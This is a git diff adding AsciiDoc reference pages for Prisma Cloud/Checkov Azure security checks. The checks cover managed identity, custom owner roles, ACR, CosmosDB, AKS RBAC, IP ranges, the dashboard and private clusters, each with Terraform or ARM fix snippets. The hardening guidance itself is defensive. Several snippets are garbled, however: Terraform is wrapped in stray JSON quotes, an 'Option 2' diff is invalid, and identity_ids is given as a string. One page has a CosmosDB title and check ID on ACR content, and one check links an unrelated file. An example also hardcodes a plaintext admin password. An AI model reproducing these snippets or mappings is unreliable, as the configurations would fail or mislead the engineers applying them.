Directory account ensuring the app will connect securely to other Azure services without the need of usernames and passwords. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * App Services*. + +. For each App, click the App. ++ +a) Navigate to the * Setting* section. ++ +b) Click * Identity*. ++ +c) Set * Status* to * On*. + + +* CLI Command* + + +To set the * Register with Azure Active Directory* feature for an existing app, use the following command: +---- +az webapp identity assign +--resource-group & lt;RESOURCE_GROUP_NAME> +--name & lt;APP_NAME> +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Field:* identity + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... ++ identity { ++ type = "UserAssigned" ++ identity_ids = "12345" + } + +}", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/do-not-create-custom-subscription-owner-roles.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/do-not-create-custom-subscription-owner-roles.adoc new file mode 100644 index 000000000..bd307c368 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/do-not-create-custom-subscription-owner-roles.adoc @@ -0,0 +1,143 @@ +== Azure subscriptions with custom roles does not have minimum permissions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c5aef549-9d4c-4217-a45f-19a9de8b3502 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py[CKV_AZURE_39] + +|Severity +|HIGH + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* Azure subscriptions with custom roles does not have minimum permissions* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] + +|=== +|Prisma Cloud Policy ID +| c5aef549-9d4c-4217-a45f-19a9de8b3502 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py[CKV_AZURE_39] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + +//// + +=== Description + + +Subscription ownership should not include permission to create custom owner roles. +The principle of least privilege should be followed and only necessary privileges be assigned instead of allowing full administrative access. +Classic subscription admin roles offer basic access management and include Account Administrator, Service Administrator, and Co-Administrators. +We recommend the minimum permissions necessary be given to subscription owner accounts initially. +Permissions can be added as needed by the account holder. +This ensures the account holder cannot perform actions which were not intended. +//// +=== Fix - Runtime + + +* CLI Command* + + +To provide a list of the role identified, use the following command: `az role definition list` +Check for entries with * assignableScope* of * /* or a * subscription*, and an action of * * * **. +To verify the usage and impact of removing the role identified, use the following command: `az role definition delete --name "rolename"` +//// +=== Fix - Buildtime + + +*Terraform* + + + + +*Option 1* + + +* *Resource:* azurerm_role_definition +* *Arguments:* actions + + +[source,go] +---- +resource "azurerm_role_definition" "example" { + name = "my-custom-role" + scope = data.azurerm_subscription.primary.id + description = "This is a custom role created via Terraform" + + permissions { + actions = [ + - "*" + + + ] + not_actions = [] + } + + assignable_scopes = [ + "/" + ] +} +---- + + +*Option 2* + + +* *Resource:* azurerm_role_definition +* *Arguments:* assignable_scopes + + +[source,json] +---- +resource "azurerm_role_definition" "example" { + name = "my-custom-role" + scope = data.azurerm_subscription.primary.id + description = "This is a custom role created via Terraform" + permissions { + actions = [ + "*" + ] + not_actions = [] + } + + assignable_scopes = [ ++ +- "/" +- data.azurerm_subscription.primary.id +- resource.azurerm_subscription.primary.id + ] +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-admin-account-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-admin-account-is-disabled.adoc new file mode 100644 index 000000000..3441b1def --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-admin-account-is-disabled.adoc @@ -0,0 +1,54 @@ +== Azure CosmosDB does not have Local Authentication disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1bd00a0d-831d-4145-a986-59999733b079 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py[CKV_AZURE_140] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Disabling the admin account for your Azure Container Registry (ACR) can help improve the security of your registry. +The admin account has full access to all resources within the registry, and can make any changes to the registry and its contents. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_container_registry +* *Arguments:* admin_enabled + + +[source,go] +---- +{ + "resource "azurerm_container_registry" "ckv_unittest_pass" { + name = "containerRegistry1" + resource_group_name = azurerm_resource_group.rg.name + location = azurerm_resource_group.rg.location + admin_enabled = false +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-disables-anonymous-image-pulling.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-disables-anonymous-image-pulling.adoc new file mode 100644 index 000000000..d69db78d4 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-acr-disables-anonymous-image-pulling.adoc @@ -0,0 +1,55 @@ +== Azure ACR enables anonymous image pulling + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a51f0c50-9178-413b-b23a-e21cd8f8e28b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py[CKV_AZURE_138] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Disabling anonymous image pulling for your Azure Container Registry (ACR) can help improve the security of your registry. +When anonymous image pulling is enabled, anyone can pull images from your registry without needing to authenticate or have authorization. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_container_registry +* *Arguments:* anonymous_pull_enabled + + +[source,go] +---- +{ + "resource "azurerm_container_registry" "ckv_unittest_pass_1" { + name = "containerRegistry1" + resource_group_name = azurerm_resource_group.rg.name + location = azurerm_resource_group.rg.location + sku = "Premium" + anonymous_pull_enabled = false +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-cosmosdb-has-local-authentication-disabled.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-cosmosdb-has-local-authentication-disabled.adoc new file mode 100644 index 000000000..e952053d3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-cosmosdb-has-local-authentication-disabled.adoc @@ -0,0 +1,64 @@ +== Azure CosmosDB does not have Local Authentication disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1bd00a0d-831d-4145-a986-59999733b079 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py[CKV_AZURE_140] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Disabling local authentication for Azure CosmosDB can help improve the security of your database. +Local authentication allows users to access the database using a local account and password, rather than an Azure Active Directory (Azure AD) account. +By disabling local authentication, you can ensure that all users must authenticate using an Azure AD account. +This can help prevent unauthorized access to the database, and can also help protect against potential security threats such as data breaches or unauthorized access. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cosmosdb_account +* *Arguments:* local_authentication_disabled + + +[source,go] +---- +{ + "resource "azurerm_cosmosdb_account" "pass" { + name = "pike-sql" + location = "uksouth" + resource_group_name = "pike" + offer_type = "Standard" + kind = "GlobalDocumentDB" + local_authentication_disabled = true + enable_free_tier = true + + consistency_policy { + consistency_level = "Session" + max_interval_in_seconds = 5 + max_staleness_prefix = 100 + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc new file mode 100644 index 000000000..9857267ad --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc @@ -0,0 +1,77 @@ +== Azure Kubernetes Service (AKS) local admin account is enabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 56b6a6d8-283f-4847-9fbc-7b93987117c4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py[CKV_AZURE_141] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Disabling the local admin account for your Azure Kubernetes Service (AKS) cluster can help improve the security of your cluster. +The local admin account has full access to all resources within the cluster, and can make any changes to the cluster and its contents. + +//=== Fix - Runtime + + +//*CLI Command* + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* local_account_disabled + + +[source,go] +---- +{ + "resource "azurerm_kubernetes_cluster" "ckv_unittest_pass" { + name = "example-aks1" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + local_account_disabled = true + + default_node_pool { + name = "default" + node_count = 1 + vm_size = "Standard_D2_v2" + } + + + identity { + type = "SystemAssigned" + } + + + tags = { + Environment = "Production" + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc new file mode 100644 index 000000000..e1a8aa3e0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc @@ -0,0 +1,74 @@ +== Azure Machine Learning Compute Cluster Local Authentication is enabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2ef37402-74b8-450f-887b-1fe6db41eb8e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLCCLADisabled.py[CKV_AZURE_142] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Disabling local authentication for Azure Machine Learning Compute Clusters can help improve the security of your clusters. +Local authentication allows users to access the cluster using a local account and password, rather than an Azure Active Directory (Azure AD) account. + +//=== Fix - Runtime + + +//*CLI Command* + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_machine_learning_compute_cluster +* *Arguments:* local_auth_enabled + + +[source,go] +---- +{ + "resource "azurerm_machine_learning_compute_cluster" "ckv_unittest_pass" { + name = "example" + location = "West Europe" + vm_priority = "LowPriority" + vm_size = "Standard_DS2_v2" + machine_learning_workspace_id = azurerm_machine_learning_workspace.example.id + local_auth_enabled = false + + scale_settings { + min_node_count = 0 + max_node_count = 1 + scale_down_nodes_after_idle_duration = "PT30S" # 30 seconds + } + + + identity { + type = "SystemAssigned" + } + +}", +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-windows-vm-enables-encryption.adoc b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-windows-vm-enables-encryption.adoc new file mode 100644 index 000000000..1032dc241 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-iam-policies/ensure-azure-windows-vm-enables-encryption.adoc @@ -0,0 +1,76 @@ +== Azure Windows VM does not enable encryption + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7fec314c-d8db-4e40-bef9-5e1cdd71db5b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py[CKV_AZURE_151] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling encryption for your Azure Windows virtual machine (VM) can help improve the security of your VM and its data. +Encryption helps protect data by encoding it in such a way that it can only be accessed by authorized users. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_windows_virtual_machine +* *Arguments:* encryption_at_host_enabled + + +[source,go] +---- +{ + "resource "azurerm_windows_virtual_machine" "pass" { + name = "example-machine" + resource_group_name = azurerm_resource_group.example.name + location = azurerm_resource_group.example.location + size = "Standard_F2" + admin_username = "adminuser" + admin_password = "P@$$w0rd1234!" + + network_interface_ids = [ + azurerm_network_interface.example.id, + ] + + os_disk { + caching = "ReadWrite" + storage_account_type = "Standard_LRS" + } + + + source_image_reference { + publisher = "MicrosoftWindowsServer" + offer = "WindowsServer" + sku = "2016-Datacenter" + version = "latest" + } + + + encryption_at_host_enabled=true +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/azure-kubernetes-policies.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/azure-kubernetes-policies.adoc new file mode 100644 index 000000000..1443ba5af --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/azure-kubernetes-policies.adoc @@ -0,0 +1,49 @@ +== Azure Kubernetes Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-kubernetes-1.adoc[Azure AKS cluster monitoring not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSLoggingEnabled.py[CKV_AZURE_4] +|MEDIUM + + +|xref:bc-azr-kubernetes-2.adoc[Azure AKS enable role-based access control (RBAC) not enforced] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py[CKV_AZURE_5] +|HIGH + + +|xref:bc-azr-kubernetes-3.adoc[AKS API server does not define authorized IP ranges] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py[CKV_AZURE_6] +|LOW + + +|xref:bc-azr-kubernetes-4.adoc[Azure AKS cluster network policies are not enforced] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSNetworkPolicy.py[CKV_AZURE_7] +|LOW + + +|xref:bc-azr-kubernetes-5.adoc[Kubernetes dashboard is not disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py[CKV_AZURE_8] +|LOW + + +|xref:ensure-that-aks-enables-private-clusters.adoc[AKS is not enabled for private clusters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py[CKV_AZURE_115] +|LOW + + +|xref:ensure-that-aks-uses-azure-policies-add-on.adoc[AKS does not use Azure policies add-on] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py[CKV_AZURE_116] +|LOW + + +|xref:ensure-that-aks-uses-disk-encryption-set.adoc[AKS does not use disk encryption set] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py[CKV_AZURE_117] +|LOW + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-1.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-1.adoc new file mode 100644 index 000000000..382d5320a --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-1.adoc @@ -0,0 +1,218 @@ +== Azure AKS cluster monitoring not enabled +// Azure Kubernetes Service (AKS) cluster monitoring disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| be55c11a-981a-4f34-a2e7-81ce40d71aa5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSLoggingEnabled.py[CKV_AZURE_4] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The Azure Monitoring service collects and stores valuable telemetry reported by AKS. +This includes memory and processor metrics for controllers, nodes and containers logs, and logs from the individual containers. +This data is accessible through Azure Log Analytics for the AKS cluster and Azure Monitor instance. +We recommend storing memory and processor metrics from containers, nodes, and controllers. +This enables strong real-time and post-mortem analysis of unknown behaviors in AKS clusters. +//// +=== Fix - Runtime + + +* CLI Command* + + +To enable Azure Monitor for an existing AKS cluster, use the following command: +---- +az aks enable-addons +-a monitoring -n rg-weu-my-cluster -g rg-weu-my-cluster-group +--workspace-resource-id 4ab81b6f-c07d-d174-ef26-f4344bad14a +---- +Use the default Log Analytics workspace: +---- +az aks enable-addons +-a monitoring -n rg-weu-my-cluster -g rg-weu-my-cluster-group +---- +This will take a few moments. +When complete, you can verify using the show command: +---- +az aks show -n rg-weu-my-cluster -g rg-weu-my-cluster-group +---- +This provides general AKS information, including the following portion for: + + +[source,shell] +---- +{ + "addonProfiles +"addonProfiles": { + "omsagent": { + "config": { + "logAnalyticsWorkspaceResourceID": + "/subscriptions/GUID/resourcegroups/defaultresourcegroup-weu/providers + /microsoft.operationalinsights/workspaces/defaultworkspace-GUID-weu" + }, + + "enabled": true + } + + }, +", +} +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* log_analytics_workspace_id + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_kubernetes_cluster" "example" { + name = "example-aks1" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + dns_prefix = "exampleaks1" + + default_node_pool { + name = "default" + node_count = 1 + vm_size = "Standard_D2_v2" + } + + + addon_profile { + oms_agent { + enabled = true + log_analytics_workspace_id = "workspaceResourceId" + } + + } + + tags = { + Environment = "Production" + } + +} + +output "client_certificate" { + value = azurerm_kubernetes_cluster.example.kube_config.0.client_certificate +} + + +output "kube_config" { + value = azurerm_kubernetes_cluster.example.kube_config_raw +}", + + +} +---- + + +*ARM Template* + + +* *Resource:* Microsoft.ContainerService/managedClusters +* *Arguments:* logAnalyticsWorkspaceResourceID + + +[source,text] +---- +{ + "{ + "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "aksResourceId": { + "type": "string", + "metadata": { + "description": "AKS Cluster Resource ID" + } + + }, + "aksResourceLocation": { + "type": "string", + "metadata": { + "description": "Location of the AKS resource e.g. \\"East US\\"" + } + + }, + "aksResourceTagValues": { + "type": "object", + "metadata": { + "description": "Existing all tags on AKS Cluster Resource" + } + + }, + "workspaceResourceId": { + "type": "string", + "metadata": { + "description": "Azure Monitor Log Analytics Resource ID" + } + + } + }, + + "resources": [ + { + "name": "[split(parameters('aksResourceId'),'/')[8]]", + "type": "Microsoft.ContainerService/managedClusters", + "location": "[parameters('aksResourceLocation')]", + "tags": "[parameters('aksResourceTagValues')]", + "apiVersion": "2018-03-31", + "properties": { + "mode": "Incremental", + "id": "[parameters('aksResourceId')]", + "addonProfiles": { + "omsagent": { + "enabled": true, + "config": { ++ "logAnalyticsWorkspaceResourceID": "[parameters('workspaceResourceId')]" + } + + } + } + + } + } + + ] + +} + +", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-2.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-2.adoc new file mode 100644 index 000000000..e2e42d26a --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-2.adoc @@ -0,0 +1,60 @@ +== Azure AKS enable role-based access control (RBAC) not enforced +// Azure Kubernetes Service (AKS) role-based access control (RBAC) not enforced + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3b6626af-9601-4e99-ace5-7197cba0d37d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py[CKV_AZURE_5] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +AKS can be configured to use Azure Active Directory (AD) and Kubernetes Role-based Access Control (RBAC). +RBAC is designed to work on resources within your AKS clusters. +With RBAC, you can create a role definition that outlines the permissions to be applied. +A user or group is then assigned this role definition for a particular scope, which could be an individual resource, a resource group, or across the subscription. +We recommend you sign in to an AKS cluster using an Azure AD authentication token and configure Kubernetes RBAC. +This will limit access to cluster resources based a user's identity or group membership. + +=== Fix - Buildtime + + +*Terraform* + + +*Resource*: azurerm_kubernetes_cluster *Argument*: role_based_access_control_enabled + + +[source,go] +---- +{ + "resource "azurerm_kubernetes_cluster" "pike" { +... ++ role_based_access_control_enabled = true +... +}", + + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-3.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-3.adoc new file mode 100644 index 000000000..f45eb9e6d --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-3.adoc @@ -0,0 +1,185 @@ +== AKS API server does not define authorized IP ranges +// Azure Kubernetes Service (AKS) API server does not define authorized IP address range + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 40bb8745-0b6c-4db4-8793-7b1d5bc9afa7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py[CKV_AZURE_6] + +|Severity +|LOW + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The AKS API server receives requests to perform actions in the cluster , for example, to create resources, and scale the number of nodes. +The API server provides a secure way to manage a cluster. +To enhance cluster security and minimize attacks, the API server should only be accessible from a limited set of IP address ranges. +These IP ranges allow defined IP address ranges to communicate with the API server. +A request made to the API server from an IP address that is not part of these authorized IP ranges is blocked. +//// +=== Fix - Runtime + + +* CLI Command* + + +When you specify a CIDR range, start with the first IP address in the range. + + +[source,shell] +---- +{ + "az aks create \\ + --resource-group myResourceGroup \\ + --name myAKSCluster \\ + --node-count 1 \\ + --vm-set-type VirtualMachineScaleSets \\ + --load-balancer-sku standard \\ + --api-server-authorized-ip-ranges 73.140.245.0/24 \\ + --generate-ssh-keys", +} +---- + +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* api_server_authorized_ip_ranges (Optional) The IP ranges to whitelist for incoming traffic to the masters. + + +[source,go] +---- +resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + +resource "azurerm_kubernetes_cluster" "example" { + ... ++ api_server_authorized_ip_ranges = '192.168.0.0/16' + ... +} + +output "client_certificate" { + value = azurerm_kubernetes_cluster.example.kube_config.0.client_certificate +} + +output "kube_config" { + value = azurerm_kubernetes_cluster.example.kube_config_raw +} +---- + + +*ARM Templates* + + +* *Resource:* Microsoft.ContainerService/managedClusters +* *Arguments:* apiServerAuthorizedIPRanges + + +[source,go] +---- +{ + "name": "string", + "type": "Microsoft.ContainerService/managedClusters", + "apiVersion": "2019-06-01", + "location": "string", + "tags": {}, + "properties": { + "kubernetesVersion": "string", + "dnsPrefix": "string", + "agentPoolProfiles": [ + { + "count": "integer", + "vmSize": "string", + "osDiskSizeGB": "integer", + "vnetSubnetID": "string", + "maxPods": "integer", + "osType": "string", + "maxCount": "integer", + "minCount": "integer", + "enableAutoScaling": "boolean", + "type": "string", + "orchestratorVersion": "string", + "availabilityZones": [ + "string" + ], + "enableNodePublicIP": "boolean", + "scaleSetPriority": "string", + "scaleSetEvictionPolicy": "string", + "nodeTaints": [ + "string" + ], + "name": "string" + } + ], + "linuxProfile": { + "adminUsername": "string", + "ssh": { + "publicKeys": [ + { + "keyData": "string" + } + ] + } + }, + "windowsProfile": { + "adminUsername": "string", + "adminPassword": "string" + }, + "servicePrincipalProfile": { + "clientId": "string", + "secret": "string" + }, + "addonProfiles": {}, + "nodeResourceGroup": "string", + "enableRBAC": "boolean", + "enablePodSecurityPolicy": "boolean", + "networkProfile": { + "networkPlugin": "string", + "networkPolicy": "string", + "podCidr": "string", + "serviceCidr": "string", + "dnsServiceIP": "string", + "dockerBridgeCidr": "string", + "loadBalancerSku": "string" + }, + "aadProfile": { + "clientAppID": "string", + "serverAppID": "string", + "serverAppSecret": "string", + "tenantID": "string" + }, + + "apiServerAuthorizedIPRanges": [ + "string" + ] + }, + "identity": { + "type": "string" + }, + "resources": [] +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-4.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-4.adoc new file mode 100644 index 000000000..d4480ba9d --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-4.adoc @@ -0,0 +1,63 @@ +== Azure AKS cluster network policies are not enforced +// Azure Kubernetes Service (AKS) cluster network policies not enforced + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 61623d0c-5208-48b2-b320-1d6eb284e61d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AKSNetworkPolicy.py[CKV_AZURE_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Network policy options in AKS include two ways to implement a network policy. +You can choose between Azure Network Policies or Calico Network Policies. +In both cases, the underlying controlling layer is based on Linux IPTables to enforce the specified policies. +Policies are translated into sets of allowed and disallowed IP pairs. +These pairs are then programmed as IPTable rules. +The principle of least privilege should be applied to how traffic can flow between pods in an AKS cluster. +We recommend you select a preferred network policy framework and enforce granular usage-based policies on the architecture and business logic of you applications. + +=== Fix - Buildtime + + +*Terraform* + + +*Resource*: azurerm_kubernetes_cluster *Argument*: network_plugin + + +[source,go] +---- +{ + "resource "azurerm_kubernetes_cluster" "pike" { +... + network_profile { + network_plugin="azure" + } + +... +}", + + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-5.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-5.adoc new file mode 100644 index 000000000..fb69f97d8 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-5.adoc @@ -0,0 +1,95 @@ +== Kubernetes dashboard is not disabled +// Kubernetes dashboard enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| aac73615-2690-46ff-869f-c868e08ac128 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py[CKV_AZURE_8] + +|Severity +|LOW + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The Terraform provider for Azure provides the capability to disable the Kubernetes dashboard on an AKS cluster. +This is achieved by providing the Kubernetes dashboard as an AKS add-on like the Azure Monitor for containers integration, AKS virtual nodes, or HTTP application routing. +The dashboard add-on is disabled by default for all new clusters created on Kubernetes 1.18 or greater. +In mid-2019 Tesla was hacked and their Kubernetes dashboard was open to the internet. +Hackers browsed around and found credentials, eventually managing to deploy pods running bitcoin mining software. +We recommend you disable the Kubernetes dashboard to prevent the need to manage its individual access interface, eliminating it as an attack vector. +//// +=== Fix - Runtime + + +* CLI Command* + + +---- +az aks disable-addons -g myRG -n myAKScluster -a kube-dashboard +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* kube_dashboard (required): Is the Kubernetes Dashboard enabled? + + +[source,go] +---- +{ + "... + addon_profile { + kube_dashboard { + enabled = false + } + + } +...", +} +---- + + +*ARM Templates* + + +* *Resource:* Microsoft.ContainerService/managedClusters +* *Arguments:* kubeDashboard + + +[source,go] +---- +{ + "... + "addonProfiles": { + "kubeDashboard": { + "enabled": false + } + + }, +...", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-enables-private-clusters.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-enables-private-clusters.adoc new file mode 100644 index 000000000..2d7b64c67 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-enables-private-clusters.adoc @@ -0,0 +1,55 @@ +== AKS is not enabled for private clusters +// Azure Kubernetes Service (AKS) disabled for private clusters + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 752df2ea-d7a3-4dc6-bac1-ec0a8379e86d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py[CKV_AZURE_115] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable the private cluster feature for your Azure Kubernetes Service cluster to ensure network traffic between your API server and your node pools remains on the private network only. +This is a common requirement in many regulatory and industry compliance standards. + +=== Fix - Buildtime + + 